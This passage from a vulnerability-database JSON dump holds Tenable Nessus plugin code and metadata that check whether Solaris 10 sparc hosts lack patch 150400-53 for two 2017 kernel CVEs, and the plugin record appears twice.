script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142007\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142332\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144540\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146808\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146838\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146848\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147697\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148161\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148174\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148231\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148338\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148553\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148557\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148721\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148730\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148766\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148875\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149502\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149616\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149640\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149642\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149648\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149718\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149729\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150108\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150109\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150115\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150125\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150161\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150169\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150300\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150307\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150311\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150400\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150527\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150531\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150532\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150541\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150627\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150629\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150756\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150760\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150840\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150841\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151145\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151149\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151425\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151608\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152367\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152530\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152539\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVmdbr\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVpiclu\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdrcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefcl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.09.15.00.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWiopc\", version:\"11.10.0,REV=2006.07.11.11.28\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.10.0,REV=2005.08.04.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomr\", version:\"11.10.0,REV=2006.10.04.00.26\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomu\", version:\"11.10.0,REV=2006.08.08.12.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.14.02.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWn2cp\", version:\"11.10.0,REV=2007.07.08.21.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpiclu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.06.03.09.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandr\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandu\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandr\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandu\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust1\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust2\", version:\"11.10.0,REV=2007.07.08.17.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FJSVhea / FJSVmdbr / FJSVpiclu / SUNWarc / SUNWarcr / SUNWbtool / etc\");\n}\n", "title": "Solaris 10 (sparc) : 150400-53", "type": "nessus", "viewCount": 25}, "differentElements": ["modified"], "edition": 7, "lastseen": "2019-10-28T21:20:59"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:solaris:10:150400", "cpe:/o:oracle:solaris:10"], "cvelist": ["CVE-2017-10004", "CVE-2017-10122"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks of this vulnerability can result in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel). Supported versions that are affected are 10 and 11. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "06fe8f2eff555099eed1ff266ae8b5658c58db36f60f311b2f7a13edb9a679ae", "hashmap": [{"hash": "be2073bfad5e624acf0f878f09eda795", "key": "naslFamily"}, {"hash": "3090dd198212a266b7086a3d36e3a74a", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "2f557dd1a5dfe7846d859df9ecc45cb4", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a65f3b2757aa383cbd16c808875a4fb9", "key": "href"}, {"hash": "e7f4914c59abc9de638d32345d9e39f8", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "16f33654c4ccc8bcf258d99cea152296", "key": "description"}, {"hash": "9b693da47adba5957bc32ade1e81b10f", "key": "modified"}, {"hash": "0e2de2f910ca127ad179eb481fe7c6b1", "key": "references"}, {"hash": "b02ba0108bebf04af1fc81be81a6b920", "key": "pluginID"}, {"hash": "cea8147bf5d9fafd75da0830e93a2ee0", "key": "title"}, {"hash": "5850355f6181ab9617cc0d094e464031", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=107721", "id": "SOLARIS10_150400-53.NASL", "lastseen": "2018-10-27T06:56:42", "modified": "2018-10-26T00:00:00", "naslFamily": "Solaris Local Security Checks", "objectVersion": "1.3", "pluginID": "107721", "published": "2018-03-12T00:00:00", "references": ["https://getupdates.oracle.com/readme/150400-53"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107721);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/10/26 10:53:24\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (sparc) : 150400-53\");\n script_summary(english:\"Check for patch 150400-53\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150400-53\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150400-53\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150400-53\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150400\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVmdbr\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVpiclu\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdrcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif 